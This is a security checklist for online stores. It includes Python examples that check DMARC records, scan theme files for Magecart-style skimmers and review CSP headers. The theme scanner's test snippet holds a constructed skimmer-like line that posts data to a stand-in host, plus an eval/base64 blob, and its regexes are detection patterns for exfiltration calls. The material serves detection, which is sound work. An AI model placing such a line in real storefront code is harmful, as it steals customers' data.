E-commerce IT Security Checklist

Storefront & Admin Access Control

    Confirm every Shopify, BigCommerce, or Magento admin account has MFA enabled — not just the owner. On Shopify Plus, enforce MFA at the organization level so new staff invites inherit the requirement. Storefront takeover via reused passwords is the #1 path to skimmer injection.

    Walk the staff list and confirm each role matches current job function. Customer service reps don't need theme-edit or app-install permissions; warehouse staff don't need finance or PII export. Document the audit so you have evidence of least-privilege review for SOC 2 or PCI scope.

    Rotate private app tokens and webhook secrets for Klaviyo, ShipStation, the 3PL (ShipBob / ShipMonk), Gorgias, and the OMS. Stale tokens from offboarded developers or sunset apps are a common backdoor.

    Cross-check the storefront admin user list against the current HR roster. Include former contractors and freelance developers who may still have access to theme code or apps.

    Where the platform supports it (Shopify Plus, BigCommerce Enterprise, Magento), restrict admin login to office IPs or VPN egress ranges. For remote-first teams, require admin access through a managed VPN with logged sessions.

Customer & Payment Data Protection

    Verify with the payment processor (Stripe, Shopify Payments, PayPal, Adyen) which SAQ applies — typically SAQ A for fully redirected/iframe checkout, SAQ A-EP if any card field is rendered on your domain. Adding a custom checkout extension can quietly push you from SAQ A to SAQ A-EP and dramatically expand scope.

    Run an SSL Labs scan against the storefront, checkout, and any custom subdomains (shop., checkout., my.). Confirm TLS 1.2+ only, valid certificate chain, HSTS header set, and no weak ciphers.

    Confirm OneTrust, Cookiebot, or Termly is firing before tracking pixels load — Meta Pixel and TikTok Pixel commonly leak before consent. Test Global Privacy Control (GPC) signal handling for California and Colorado visitors. Verify the "Do Not Sell or Share" link is present in the footer.

    Update the list of vendors that touch customer PII — Klaviyo, Yotpo, Gorgias, the reviews app, the loyalty app, the shipping carriers. Confirm a current DPA on file for each EU/UK-data vendor and that your privacy policy lists them.

    Restore a recent backup of products, customers, orders, and theme code into a development store. Confirm metafields, customer tags, and Klaviyo profile sync survive the restore. A backup that has never been restored is not a backup.

Storefront Network & Infrastructure

    For self-hosted WooCommerce or Magento, run a Nessus or OWASP ZAP scan against the production environment outside peak hours. For Shopify / BigCommerce, scan any custom subdomains and headless storefronts you own.

    Check Cloudflare, Sucuri, or platform-native WAF rules for blocked-request volume and false positives. Confirm bot-management is challenging credential-stuffing patterns on the customer login endpoint — a common precursor to account takeover and gift card draining.

    Check transactional (Shopify, Klaviyo, Postscript) and marketing sending domains. DMARC should be at p=quarantine or p=reject — Gmail and Yahoo now require this for bulk senders. A domain at p=none is wide open for phishing customers from your own brand.
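As an added example (not part of the checklist and not a Manifestly or vendor tool), a Python checker that scores a DMARC TXT record against this item; the records below are constructed samples, and in practice you would feed it the output of `dig TXT _dmarc.<your-domain>` for each sending domain.

```python
# Constructed sample records for this example; real ones come from `dig TXT _dmarc.<domain>`.
SAMPLE_RECORDS = {
    "_dmarc.shop.example": "v=DMARC1; p=none; rua=mailto:dmarc@shop.example",
    "_dmarc.mail.example": "v=DMARC1; p=quarantine; pct=50; rua=mailto:dmarc@mail.example",
    "_dmarc.brand.example": "v=DMARC1; p=reject; sp=none; adkim=s; aspf=s",
}

def parse_dmarc(txt):
    """Split a DMARC TXT record into a tag dict; return None if it is not a DMARC1 record."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            key, _, value = part.strip().partition("=")
            tags[key.strip().lower()] = value.strip()
    return tags if tags.get("v", "").upper() == "DMARC1" else None

def assess_dmarc(txt):
    """Return (enforcing, findings): enforcing is True only when nothing weakens p=quarantine/reject."""
    tags = parse_dmarc(txt)
    if tags is None:
        return False, ["no valid DMARC record: v=DMARC1 missing or malformed"]
    findings = []
    policy = tags.get("p", "").lower()
    if policy not in ("quarantine", "reject"):
        findings.append(f"p={policy or 'missing'}: receivers deliver spoofed mail normally")
    # sp= governs subdomains and inherits p= when absent, so only an explicit weak sp= is a gap
    sub = tags.get("sp", "").lower()
    if sub and sub not in ("quarantine", "reject"):
        findings.append(f"sp={sub}: subdomain senders are not covered by the policy")
    # pct= defaults to 100; anything lower applies the policy to only a sample of failing mail
    pct = int(tags.get("pct", "100") or 100)
    if policy in ("quarantine", "reject") and pct < 100:
        findings.append(f"pct={pct}: only {pct}% of failing mail gets the policy applied")
    if "rua" not in tags:
        findings.append("no rua= address: aggregate reports on spoofing attempts go nowhere")
    return not findings, findings

if __name__ == "__main__":
    for name, record in SAMPLE_RECORDS.items():
        enforcing, findings = assess_dmarc(record)
        print(name, "OK" if enforcing else "; ".join(findings))
```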

    For Magento / Adobe Commerce, apply the latest security patches and SUPEE updates. For WooCommerce, update WordPress core, WooCommerce, and any payment-gateway plugins. Out-of-date Magento installs are a primary Magecart target.

    Confirm staging URLs require basic auth or VPN, return X-Robots-Tag: noindex, and contain no real customer PII. A staging copy of the production database with real emails and addresses, indexed by Google, is a state breach-notification event.

Incident Response & Breach Readiness

    Update contact info, escalation paths, and decision authority. The runbook should name who decides to take the storefront offline, who notifies the processor, and who drafts customer communication. Stale runbooks with last-year's COO listed are useless at 2am on Black Friday.

    Walk a realistic scenario — Magecart skimmer detected on checkout, credential-stuffing attack on customer accounts, or ransomware on the OMS. Time the response. Note where decision authority was unclear or contact info was stale.

    Address each gap surfaced in the exercise — missing decision authority, stale vendor contacts, undocumented rollback procedure. Re-test the specific scenario that failed before closing this step.

    Confirm current after-hours contacts at the payment processor, hosting provider, 3PL, and outside counsel. Include forensics retainer (Mandiant, CrowdStrike, or your cyber insurance panel firm) if you have one.

    Document the notification windows for states where you ship — most require notice "without unreasonable delay" with hard deadlines in some (e.g., 30-60 days). GDPR is 72 hours to the supervisory authority. Knowing this in advance is the difference between a measured response and a regulatory escalation.

App, Theme & Integration Security

    Walk the Shopify or BigCommerce app list. Uninstall anything not in active use — uninstalled apps drop their access scopes. For active apps, confirm each one's read/write scopes match what it actually needs; legacy apps often request customer PII access they no longer use.

    Diff the live theme against the last known-good version in your Git repo. Look for unexpected script tags, base64-encoded blobs, or fetch calls to unfamiliar domains in checkout.liquid, layout/theme.liquid, and any custom snippet. Magecart variants frequently hide in image-loading and analytics-shaped code.
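An added example, not from the checklist or from Shopify: a Python pass over theme files that flags the patterns this item names (script tags from unfamiliar hosts, fetch/sendBeacon calls to unfamiliar hosts, long base64 blobs, eval-style execution). KNOWN_DOMAINS is an assumed allowlist and SAMPLE_THEME is a constructed snippet; a real run would read the changed files from your theme repo, and every hit is a line to review rather than a verdict.

```python
import re
from urllib.parse import urlparse

# Hosts this storefront legitimately loads from (assumed allowlist; extend for your own vendors).
KNOWN_DOMAINS = {"cdn.shopify.com", "static.klaviyo.com", "connect.facebook.net",
                 "analytics.tiktok.com", "www.googletagmanager.com"}

SCRIPT_SRC = re.compile(r"""<script[^>]+src=["']([^"']+)["']""", re.I)
NET_CALL = re.compile(r"""\b(?:fetch|sendBeacon)\s*\(\s*["']([^"']+)["']""", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/=]{60,}")           # long encoded run, worth a look
DYNAMIC = re.compile(r"\b(?:eval|Function)\s*\(|document\.write\s*\(", re.I)

def host_of(url):
    """Hostname of an absolute or protocol-relative URL; '' for relative or Liquid-templated paths."""
    parsed = urlparse(url if "//" in url else "//" + url)
    host = (parsed.hostname or "").lower()
    return host if "." in host else ""

def scan_theme_file(path, text):
    """Return (path, line_no, reason) for every line matching a skimmer-shaped pattern."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for match in SCRIPT_SRC.finditer(line):
            host = host_of(match.group(1))
            if host and host not in KNOWN_DOMAINS:
                findings.append((path, n, f"script loaded from unfamiliar host {host}"))
        for match in NET_CALL.finditer(line):
            host = host_of(match.group(1))
            if host and host not in KNOWN_DOMAINS:
                findings.append((path, n, f"network call to unfamiliar host {host}"))
        if B64_BLOB.search(line):
            findings.append((path, n, "long base64-looking blob"))
        if DYNAMIC.search(line):
            findings.append((path, n, "eval/Function/document.write runs code built at runtime"))
    return findings

# Constructed theme snippet: two legitimate tags, then two lines shaped like the patterns above.
SAMPLE_THEME = (
    '<script src="https://cdn.shopify.com/s/files/1/0001/t/3/assets/theme.js"></script>\n'
    '<script src="https://static.klaviyo.com/onsite/js/klaviyo.js"></script>\n'
    """<img src="{{ 'logo.png' | asset_url }}" onload="fetch('https://img-cdn-stats.example/c',{method:'POST',body:'x'})">\n"""
    "<script>eval(atob('" + "QUFB" * 16 + "'))</script>\n"
)

if __name__ == "__main__":
    for path, n, reason in scan_theme_file("layout/theme.liquid", SAMPLE_THEME):
        print(f"{path}:{n}: {reason}")
```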

    If the diff turns up injected code, take the storefront to maintenance mode, notify the payment processor (they can flag affected card ranges), engage forensics, and preserve server logs and theme history. Do not roll back the theme until forensics has captured the malicious code as evidence.

    For Shopify Checkout Extensibility or BigCommerce custom checkout, review every extension for what data it reads and where it sends it. A checkout UI extension that posts cart contents to a marketing endpoint can quietly expand your PCI SAQ scope.

    Review the CSP header against the actual list of legitimate third-party scripts (Klaviyo, Meta Pixel, TikTok Pixel, Google Tag Manager, Yotpo). An overly permissive CSP defeats its purpose; an absent CSP means a skimmer's exfiltration domain has no policy to block it.
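An added example, not from the checklist or any platform: a Python review of a Content-Security-Policy header against a script allowlist. It goes slightly beyond the item by also checking connect-src and form-action, the directives that actually decide whether a skimmer can send data out. ALLOWED_SCRIPT_HOSTS is an assumed allowlist and the two headers are constructed (hostnames illustrative).

```python
# Vendors allowed to serve scripts on the storefront (assumed allowlist; match it to your stack).
ALLOWED_SCRIPT_HOSTS = {"cdn.shopify.com", "static.klaviyo.com", "connect.facebook.net",
                        "analytics.tiktok.com", "www.googletagmanager.com"}
BROAD_SOURCES = {"*", "https:", "http:", "data:", "'unsafe-inline'", "'unsafe-eval'"}

def parse_csp(header):
    """Turn 'dir a b; dir2 c' into {'dir': ['a', 'b'], 'dir2': ['c']}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.strip().split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy

def host_of(source):
    """https://cdn.example:443/path -> cdn.example (scheme, port and path dropped)."""
    return source.split("//", 1)[-1].split("/", 1)[0].split(":", 1)[0].lower()

def review_csp(header):
    """List the reasons this CSP would fail to contain an injected skimmer; [] means it holds up."""
    if not header or not header.strip():
        return ["CSP absent: an injected script can load from and post to any origin"]
    policy = parse_csp(header)
    findings = []
    scripts = policy.get("script-src", policy.get("default-src"))  # script-src falls back to default-src
    if scripts is None:
        findings.append("no script-src or default-src: script loading is unrestricted")
    for src in scripts or []:
        if src in BROAD_SOURCES:
            findings.append(f"script-src allows {src}: broad enough to defeat the policy")
        elif src.startswith("'"):
            continue                      # 'self', 'nonce-...', 'sha256-...', 'strict-dynamic' are fine
        elif host_of(src).startswith("*."):
            findings.append(f"script-src wildcard {src}: any subdomain can serve scripts")
        elif host_of(src) not in ALLOWED_SCRIPT_HOSTS:
            findings.append(f"script-src allows {host_of(src)}, which is not on the vendor allowlist")
    # Exfiltration leaves via fetch/XHR/beacon or a repointed form; those need their own directives.
    connect = policy.get("connect-src", policy.get("default-src"))
    if connect is None or "*" in connect:
        findings.append("connect-src missing or wildcard: fetch/XHR/beacon to other origins is not blocked")
    if "form-action" not in policy:       # form-action does not inherit from default-src
        findings.append("form-action missing: the checkout form can be repointed to another origin")
    return findings

# Constructed headers: the first is typical of a copy-pasted 'just make it work' policy.
WEAK_CSP = "default-src 'self'; script-src 'self' 'unsafe-inline' https: https://cdn.shopify.com; img-src *"
STRONG_CSP = ("default-src 'self'; script-src 'self' 'nonce-EXAMPLE' https://cdn.shopify.com "
              "https://static.klaviyo.com; connect-src 'self' https://collect.vendor.example; "
              "form-action 'self' https://checkout.shopify.com; img-src * data:")
```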
